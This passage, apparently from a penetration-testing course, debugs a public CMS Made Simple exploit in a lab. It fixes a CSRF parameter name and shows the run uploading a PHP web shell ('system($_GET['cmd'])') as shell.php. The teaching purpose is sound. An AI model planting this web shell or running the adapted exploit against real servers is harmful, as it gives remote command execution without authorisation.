As we determined in the previous section, the Python interpreter raised an error related to line 24 of the modified exploit.

Examining this line, we see that it uses the split method to slice the string stored in the location parameter passed to the parse_csrf_token function. The Python documentation for split states that the method slices the input string using an optional separator passed as the first argument. The string fragments returned by split are stored in a Python list object and can be accessed by index:

kali@kali:~$ python
...
>>> mystr = "Kali*-*Linux*-*Rocks"
>>> result = mystr.split("*-*")
>>> result
['Kali', 'Linux', 'Rocks']
>>> result[1]
'Linux'

Listing 33 - The Python string split method

In our exploit code, the string separator is set to the value of the csrf_param variable ("__c") followed by an equals sign:

csrf_param = "__c"
txt_filename = 'cmsmsrce.txt'
php_filename = 'shell.php'
payload = "<?php system($_GET['cmd']);?>"

def parse_csrf_token(location):
    # Split the redirect URL on "<csrf_param>=" and keep everything after it.
    # If that separator is not present, the list has one element and [1] raises IndexError.
    return location.split(csrf_param + "=")[1]

Listing 34 - Understanding the code on line 24

To better understand the IndexError, we can add a print statement to the parse_csrf_token function before the return statement:

csrf_param = "__c"
txt_filename = 'cmsmsrce.txt'
php_filename = 'shell.php'
payload = "<?php system($_GET['cmd']);?>"

def parse_csrf_token(location):
    # Python 2 print statement: the exploit is run with python2
    print "[+] String that is being split: " + location
    return location.split(csrf_param + "=")[1]

Listing 35 - Adding a print statement to see the string on which the split method is called

The exploit now displays the full string before the split method is called:

kali@kali:~$ python2 44976_modified.py
/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py:849: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
  InsecureRequestWarning)
[+] Authenticated successfully with the supplied credentials
[+] String that is being split: https://10.11.0.128/admin?_sk_=f2946ad9afceb247864
Traceback (most recent call last):
  File "44976_modified.py", line 104, in <module>
    run()
  File "44976_modified.py", line 95, in run
    cookies,csrf_token = authenticate()
  File "44976_modified.py", line 39, in authenticate
    return response.cookies, parse_csrf_token(response.headers['Location'])
  File "44976_modified.py", line 25, in parse_csrf_token
    return location.split(csrf_param + "=")[1]
IndexError: list index out of range

Listing 36 - Examining the print output and noticing the absence of the string set in the csrf_param variable

Although the exploit code expected the input string to contain "__c", as set in the csrf_param variable (shown in Listing 35), we received "_sk_" from the web application instead.
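The IndexError above is the symptom of a more general weakness in the helper: splitting a URL on "<name>=" and taking index 1 fails with an unhelpful error when the parameter name differs, and it also returns any parameters that follow the token. The Python 3 example below, added here and not part of the exploit or of the course text, shows the fragile approach next to a parser that reads the query string properly, accepts both parameter names seen on this page, and reports exactly what was found when neither is present. The Location values are constructed samples modelled on the listings, and the host name is a placeholder.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample Location headers (hypothetical host), modelled on the listings:
LOCATION_OLD = "https://cms.example/admin?__c=abc123"                 # name the exploit expected
LOCATION_NEW = "https://cms.example/admin?_sk_=bdc51a781fe6edcc126"   # name our CMS returned
LOCATION_MULTI = "https://cms.example/admin?_sk_=tok&x=1"             # token followed by more params
LOCATION_NONE = "https://cms.example/admin?foo=bar"                   # no CSRF parameter at all


def parse_csrf_token_fragile(location, csrf_param="__c"):
    """The original approach: split on '<csrf_param>=' and take index 1.

    Raises IndexError when the separator is absent, and returns the rest of the
    query string (not just the token) when other parameters follow it.
    """
    return location.split(csrf_param + "=")[1]


def parse_csrf_token(location, candidates=("__c", "_sk_")):
    """Parse the redirect URL's query string and look for any known parameter name.

    Returns (name, token). Raises ValueError with the keys actually present so a
    mismatch like the one on this page is diagnosed from the message alone.
    """
    query = parse_qs(urlsplit(location).query)
    for name in candidates:
        values = query.get(name)
        if values:
            return name, values[0]
    raise ValueError(
        "no CSRF parameter among %r in Location %r (query keys present: %s)"
        % (candidates, location, sorted(query))
    )


def try_parse(parser, *args):
    """Run a parser and return ("ok", value) or ("error", exception class name)."""
    try:
        return ("ok", parser(*args))
    except (IndexError, ValueError) as exc:
        return ("error", type(exc).__name__)


if __name__ == "__main__":
    # The fragile helper only works when the parameter name guess is right.
    print(try_parse(parse_csrf_token_fragile, LOCATION_OLD))            # ('ok', 'abc123')
    print(try_parse(parse_csrf_token_fragile, LOCATION_NEW))            # ('error', 'IndexError')
    print(try_parse(parse_csrf_token_fragile, LOCATION_MULTI, "_sk_"))  # ('ok', 'tok&x=1')
    # The query-string parser handles both names and isolates the token.
    print(try_parse(parse_csrf_token, LOCATION_OLD))                    # ('ok', ('__c', 'abc123'))
    print(try_parse(parse_csrf_token, LOCATION_NEW))                    # ('ok', ('_sk_', 'bdc51a781fe6edcc126'))
    print(try_parse(parse_csrf_token, LOCATION_MULTI))                  # ('ok', ('_sk_', 'tok'))
    print(try_parse(parse_csrf_token, LOCATION_NONE))                   # ('error', 'ValueError')
```

The point of the descriptive ValueError is the same as the print statement added in Listing 35: when a public exploit assumes a parameter name, version or configuration that does not match the target, the failure should tell you what was actually received rather than just "list index out of range".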

At this point we do not fully understand why this is happening. Perhaps there is a mismatch between the exploit developer's software version and ours, or the CMS configuration differs. In any case, we know that exploit development rarely goes smoothly.

Next, we will try adapting the csrf_param variable to match the CMS response and determine whether the exploit works:

csrf_param = "_sk_"
txt_filename = 'cmsmsrce.txt'
php_filename = 'shell.php'
payload = "<?php system($_GET['cmd']);?>"

Listing 37 - Modifying the csrf_param variable

Now we run the modified exploit:

kali@kali:~$ python2 44976_modified.py
/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py:849: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
  InsecureRequestWarning)
[+] Authenticated successfully with the supplied credentials
[+] String that is being split: https://192.168.50.45/admin?_sk_=bdc51a781fe6edcc126
[*] Attempting to upload cmsmsrce.txt...
...
[+] Successfully uploaded cmsmsrce.txt
[*] Attempting to copy cmsmsrce.txt to shell.php...
...
[+] File copied successfully
[+] Exploit succeeded, shell can be found at: https://192.168.50.45/uploads/shell.php